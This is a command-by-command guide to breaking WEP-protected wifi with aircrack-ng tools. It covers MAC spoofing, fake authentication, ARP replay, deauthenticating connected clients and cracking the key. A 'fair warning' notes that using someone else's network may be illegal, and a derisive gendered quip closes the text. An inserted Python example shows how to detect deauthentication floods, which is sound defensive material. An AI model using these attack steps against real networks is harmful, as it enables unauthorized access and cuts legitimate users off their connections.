1.) Start monitor mode:
airmon-ng
Copy down interface
airmon-ng start (interface)
If it says "mon0" or "wifi0" is used, this is your new interface
If it says other things are running, type "kill (PID#)" for each
2.) Injection test:
aireplay-ng -9 (interface)
The APs that send pings back can be injected
Copy down your target's BSSID, channel & ESSID
aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)
This lets you test a specific AP; it can be useful for verifying hidden SSIDs
or alternative BSSIDs
3.) Target a specific channel:
airmon-ng start (interface) (channel)
4.) Change MAC:
airmon-ng stop (interface(s))
ifconfig (interface) down
macchanger --mac (faked:mac) (interface)
Copy down faked:mac
5.) Begin packet capture:
airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)
Keep an eye out for authenticating clients' MACs under Station
If one is found & step 6 isn't going well, go back to step 4 and use that MAC
You may have to stop the monitoring interface & the physical one
6.) Fake authentication:
- Put in second shell*
aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)
Successful authentication will continually send keep-alive packets
Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers
7.) ARP replay:
- Put in third shell*
aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)
8.) Crack WEP key:
- Put in a fourth shell*
aircrack-ng -b (BSSID) (dump-name)-01.cap
A minimum of around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit
Try "aircrack-ng -n 64 (dump-name)*cap" every 10,000 IVs
If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters
If key bytes are all numbers, try running with "-t" to assume an all numeric key
Add -x2 to brute force the last 2 bytes
If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour
Retry with the fudge factor increased by 4 more if that's unsuccessful
If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key
Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes
- Other attack methods:
Injection attack with 2 wireless cards:
aireplay-ng -9 -i (receiving interface) (injecting interface)
If it fails on attack -5, make sure the injection interface MAC matches the current card MAC
Deauthentication attack:
aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)
Can be faster than an ARP replay, but you must know the MAC of an authenticated client who is online
This will disconnect the authenticated client, so they may get suspicious
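Detection counterpart to the deauthentication attack above, as an added example that is not part of the original cheat sheet: it parses the 802.11 header of raw frames, picks out deauthentication frames (management type 0, subtype 12) and flags any sender that emits a burst of them inside a short window, which is what a wireless IDS looks for. The threshold, window and all MAC addresses are constructed placeholders.

```python
"""Flag deauthentication floods in raw 802.11 frames (added example)."""
import struct
from collections import defaultdict, deque

THRESHOLD = 5   # deauth frames from one sender per window before alerting (assumed)
WINDOW = 2.0    # sliding window in seconds (assumed)

def parse_frame(raw: bytes):
    """Return (is_deauth, src, bssid, reason) from an 802.11 header, or None if too short."""
    if len(raw) < 24:
        return None
    ftype = (raw[0] >> 2) & 0x3                # frame control: type in bits 2-3
    subtype = (raw[0] >> 4) & 0xF              # subtype in bits 4-7
    is_deauth = ftype == 0 and subtype == 12   # management / deauthentication
    src = raw[10:16].hex(":")                  # addr2 = transmitter address
    bssid = raw[16:22].hex(":")                # addr3 = BSSID
    reason = struct.unpack("<H", raw[24:26])[0] if is_deauth and len(raw) >= 26 else None
    return is_deauth, src, bssid, reason

def detect_deauth_flood(frames):
    """frames: iterable of (timestamp_seconds, raw_bytes).
    Returns {src: peak_count} for senders exceeding THRESHOLD deauths within WINDOW."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None or not parsed[0]:
            continue
        src = parsed[1]
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > WINDOW:        # drop timestamps outside the window
            q.popleft()
        if len(q) > THRESHOLD:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged

def build_deauth(src: bytes, dst: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Constructed deauth frame, used only to build the sample capture below."""
    header = bytes([0xC0, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    return header + struct.pack("<H", reason)

# Constructed sample capture with placeholder addresses, not real devices.
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("66778899aabb")
OTHER_AP = bytes.fromhex("0a0b0c0d0e0f")
SAMPLE = [(i * 0.1, build_deauth(AP, CLIENT, AP)) for i in range(8)]  # burst from AP
SAMPLE.append((1.0, build_deauth(OTHER_AP, CLIENT, OTHER_AP)))         # lone deauth, benign
SAMPLE.append((1.1, bytes([0x08, 0x00]) + bytes(22)))                 # data frame, ignored

if __name__ == "__main__":
    for src, peak in detect_deauth_flood(SAMPLE).items():
        print(f"deauth flood from {src}: {peak} frames within {WINDOW}s")
```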
Fair warning
Depending on where you are on this beautiful planet, connecting to someone else's wifi may or may not be entirely legal. The instructions above are merely for educational purposes (one can always test the security or lack thereof of one's own network). As it was mentioned at the beginning, this was the manly man's way. For the girly sissy way, go to youtube and look up gerix-wifi-cracker. It's made everything way easier. :)